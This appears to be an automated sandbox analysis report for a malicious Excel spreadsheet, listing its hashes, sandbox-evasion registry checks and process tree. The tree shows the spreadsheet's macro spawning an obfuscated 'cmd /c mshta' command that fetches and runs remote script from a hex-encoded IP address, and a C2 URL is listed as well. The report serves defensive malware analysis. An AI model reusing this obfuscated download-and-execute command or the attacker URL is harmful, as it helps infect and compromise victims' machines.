Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2024, 09:47
Behavioral task
behavioral1
Sample
24ca505f24619029d18677eb0d8ba7496f217e9f822d0e390de9462bfb3f7f24.xls
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
24ca505f24619029d18677eb0d8ba7496f217e9f822d0e390de9462bfb3f7f24.xls
Resource
win10v2004-20241007-en
General
-
Target
24ca505f24619029d18677eb0d8ba7496f217e9f822d0e390de9462bfb3f7f24.xls
-
Size
102KB
-
MD5
e0afe16bc322e3a665831725ef87d03f
-
SHA1
642990e1712c48f480beb3a34092d8aab3625f40
-
SHA256
24ca505f24619029d18677eb0d8ba7496f217e9f822d0e390de9462bfb3f7f24
-
SHA512
0cbbe8bf34e76292dfe1a2bc4e2546ef6c74a5a72288b728ee45eba29700166e38d594a4ba2ae5f4c4bbff15817eecc6aaf79d86fe445e6bf866bc6605dc109d
-
SSDEEP
3072:n/k3hbdlylKsgqopeJBWhZFGkE+cL2NdAFxe53lGvFTQ3IzxgdrvxpU0OKvMB:/k3hbdlylKsgqopeJBWhZFVE+W2NdAOK
Malware Config
Extracted
http://185.7.214.7/fer/fe3.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1204 460 cmd.exe 82 -
Blocklisted process makes network request 1 IoCs
flow pid Process 20 4528 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 460 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE 460 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 460 wrote to memory of 1204 460 EXCEL.EXE 87 PID 460 wrote to memory of 1204 460 EXCEL.EXE 87 PID 1204 wrote to memory of 4528 1204 cmd.exe 89 PID 1204 wrote to memory of 4528 1204 cmd.exe 89
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\24ca505f24619029d18677eb0d8ba7496f217e9f822d0e390de9462bfb3f7f24.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:460 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe3.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fe3.html3⤵
- Blocklisted process makes network request
PID:4528
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5e22677c23b8b5447c6e99ec7f4a4cb84
SHA1b0fd95fa0798bad5b80bcdb639ecf12820d5bb15
SHA256cac7f75a884d43df73414c4dcad79cd1fb82cc8d08226f625ee90d38c6162fd6
SHA512190f3cb7cf49048abf97cce070e6cbc5c7a43a4480888531704f25540c508e953049e963b22c06a7d1fac248a0cb8e11a2c3247c70311c33545b2f5fc59c2324